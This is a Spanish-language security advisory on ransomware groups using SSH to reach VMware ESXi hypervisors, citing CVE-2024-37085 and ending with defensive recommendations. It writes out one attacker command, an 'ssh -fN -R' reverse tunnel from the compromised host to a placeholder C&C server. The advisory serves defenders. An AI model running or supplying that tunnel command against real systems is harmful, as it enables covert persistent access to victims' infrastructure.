SSH aprovechado por grupos de Ransomware en sistemas ESXI
Los ataques de ransomware se adaptan día con día para alcanzar nuevos objetivos y generar más daños a organizaciones, gobiernos o cualquier entidad que puedan comprometer.
ESXi es un hipervisor empresarial ampliamente usado por las organizaciones y es un objetivo altamente valioso para los cibercriminales, pues, teniendo acceso a ESXi, pueden causar muchísimo daño.
Recientemente, se ha detectado que distintas bandas de ransomware están utilizando SSH para conectarse a sistemas ESXi con el fin de desplegar ransomware, moverse lateralmente y/o ganar persistencia. Esto se debe a que estos sistemas rara vez se apagan debido a su criticidad en la operación de una empresa y sirven como una puerta trasera para los atacantes.
Para vulnerar el acceso a ESXi mediante SSH, los atacantes emplean diversas técnicas, como el uso de credenciales válidas o la explotación de vulnerabilidades que les permiten evadir autenticaciones. ESXi ha presentado múltiples vulnerabilidades de este tipo, por lo que es fundamental evaluar su seguridad.
Un ejemplo es la siguiente vulnerabilidad CVE-2024-37085, que afecta implementaciones de ESXi administradas mediante Active Directory (AD). Un actor malicioso con suficientes permisos en AD puede obtener acceso completo a un ESXi Esto es posible porque el atacante puede modificar la política de grupo y establecer una configuración por defecto, obteniendo acceso. Esta vulnerabilidad es conocida por ser utilizada en campañas de ransomware por parte de BlackBasta.
Una vez dentro del dispositivo, el atacante puede establecer un túnel desde el sistema ESXi hacia un servidor de Command and Control (C&C) usando la función nativa del sistema e introduciendo el siguiente comando:
ssh – fN -R 127.0.0.1:<Puerto> <Usuario>@<IP del servidor C&C>
Diagrama del proceso de conexión por el atacante
Este método de operación de los grupos de ransomware es muy difícil de detectar debido a la dificultad de recopilar logs dentro de los sistemas ESXi, ya que estos se encuentran repartidos en diversas carpetas y es más complicado centralizarlos sin una herramienta adecuada. Por ello, se recomienda seguir las mejores prácticas y mantener siempre el sistema actualizado para contar con los últimos parches de seguridad.
Recomendaciones
-
Establecer controles de acceso SSH basados en la red para minimizar el riesgo de ataque
-
Auditar herramientas de acceso remoto. (NIST CSF, 2024)
-
Revisar logs para de ejecución de software de acceso remoto. (NIST CSF, 2024)
-
Limitar estrictamente el uso de los protocolos SMB y RDP.
-
Realizar auditorías de seguridad. (NIST CSF, 2024)
-
Deshabilitar los servicios y procesos no requeridos para reducir los vectores de ataque. (NIST CSF, 2024)
-
Tener filtros de correo electrónico y spam.
-
Concientizar a los empleados sobre los métodos de Phishing e Ingeniería social.
-
Realizar copias de seguridad, respaldos o back-ups constantemente.
-
Mantener los respaldos desconectados de la red de la organización, verificando constantemente la confidencialidad, integridad y disponibilidad de estos.
-
Revisar continuamente los privilegios de los usuarios.
-
Tener una solución EDR robusta configurada adecuadamente basada en las mejores prácticas (de acuerdo con documentación de fabricante).
-
Habilitar la autenticación multifactor.
Referencias
-
Hau, Z. Yow, R. (2025. Enero 21) ESXi Ransomware Attacks: Stealthy Persistence through SSH Tunneling. Recuperado el 27 de enero del 2025 en: https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/
-
Toulas, B. (2025, Enero 26) Ransomware gang uses SSH tunnels for stealthy VMware ESXi access. Recuperado el 27 de enero del 2025 en: https://www.bleepingcomputer.com/news/security/ransomware-gang-uses-ssh-tunnels-for-stealthy-vmware-esxi-access/
